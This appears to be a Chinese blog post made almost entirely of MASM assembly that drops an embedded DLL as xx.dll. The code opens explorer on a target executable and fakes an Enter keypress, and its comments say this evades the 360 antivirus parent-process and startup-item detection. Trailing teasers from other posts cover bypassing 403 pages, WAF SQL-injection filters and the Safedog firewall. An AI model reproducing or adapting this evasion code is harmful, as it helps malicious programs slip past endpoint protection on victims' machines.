2014簡單繞過某60父程序查殺

2021-07-02 02:18:46 字數 2827 閱讀 3490



;落筆飛花笑百生

;2014.12.9

;過360父程序乙個弱弱的方法

;過360啟動項

.386

.model flat,stdcall

option casemap:none

include windows.inc

includelib kernel32.lib

include kernel32.inc

include user32.inc

includelib user32.lib

include c:\users\巫師\desktop\radasm\masm32\macros\strings.mac

dll equ 105

.const

.data

windowname byte 100 dup (?)

tests byte "c:\program files\tlxsoft\螢幕錄影專家 共享版 v2014\屏錄專家.exe",0

version osversioninfoex<?>

explorerpatch byte "explorer /e, /select,  "

exepatch byte "c:\program files\tlxsoft\螢幕錄影專家 共享版 v2014\屏錄專家.exe",0

;exepatch byte 260 dup(?)

dllpatch byte 260 dup (?)

dllname byte "/xx.dll",0

dllpoiter dd 00

dllsize dd 00

filehandle dd 00

filewriteold dd 00

.code

start:

mov eax,offset tests

mov ebx,sizeof tests

add eax,ebx ;這裡已經指向最後乙個00

mov ecx,ebx

xor ebx,ebx

xor edi,edi

lop:

dec eax

mov  dl,byte ptr [eax]

cmp dl,'\'

je xx

jmp yy

xx:cmp ebx,0

jne cc

mov ebx,ecx;第乙個\

jmp yy

cc:mov edi,ecx;第二個\

mov ecx,0

jmp loopend

yy:loop lop

loopend:;這裡就已經拿到了位置 edi=正數第乙個\ebx=正數最後乙個\中間的也就是資料夾名字

mov eax,offset tests;首位址拿到手

add eax,edi

add  edi,1

sub ebx,edi;長度給ebx

;下面我們要複製字串長度為ebx,起始位址為eax的字串到乙個位置就完成了這裡當然用movs 指令來玩

mov ecx,ebx

cldmov esi,eax

mov edi,offset windowname;這個就是資料夾的名稱記憶體首位址

rep movsb

invoke getcurrentdirectory,260,offset dllpatch

invoke lstrcat,addr dllpatch,addr dllname

invoke createfile,addr dllpatch,generic_write,file_share_write,null,create_always,file_attribute_normal,null

mov filehandle,eax;檔案控制代碼

invoke findresource,null,dll,rt_rcdata

mov dllsize,eax

invoke loadresource,null, dllsize

invoke lockresource,eax

mov dllpoiter,eax;資源位址拿到手

invoke sizeofresource,null, dllsize

mov dllsize,eax;檔案大小拿到手

invoke writefile, filehandle, dllpoiter, dllsize, filewriteold,null

;invoke getmodulefilename,null,offset exepatch,sizeof exepatch

invoke winexec,offset explorerpatch,sw_show

invoke getversionex,offset version 

;.if version.dwmajorversion==5 && version.dwminorversion==1;xp系統就不用模擬了直接執行之。。

;jmp yy

;.endif

;yy:

invoke sleep,2000

invoke findwindow,$cta0("cabinetwclass"),offset windowname

mov edx,eax

invoke setforegroundwindow,eax

;;*****

invoke keybd_event,vk_return ,0,keyeventf_extendedkey,0

invoke keybd_event,vk_return ,0,keyeventf_keyup,0

invoke sendmessage,edx,wm_close,0,0

end start

403簡單繞過

403 forbidden 是http協議中的乙個狀態碼 status code 白話理解,沒有許可權訪問此站 該狀態表示伺服器處理了本次請求,但是拒絕執行該務 一般情況站點都是不會允許直接讀取目錄內容的。每當發現403頁面時,這意味著裡面有東西,我們只需要繞過它。繞過403禁止的技術有很多,但在這...

某waf實戰SQL注入繞過fuzz過程

01 環境簡介 伺服器 windows2008 r2 軟體 phpstudy20180211 php 5.4.45 mysql 5.5.53 某鎖win 3.1.18.13服務端版本 02 fuzz過程 以基於union注入為例 fuzz order by 過程如下 id 1 order 不攔截 i...

安全狗最新版繞過測試2023年10月23日

測試版本 iis版v3.3.09476 2014 09 24 apache v3.1.08512 2014 05 29 均為今天能下到的最新版。用於繞過的核心字元 0a,某些特殊場合需要和注釋符配合使用。測試詳細步驟 1 本機安裝了存在注入的v5shop 構架為iis6 aspx mssql2005...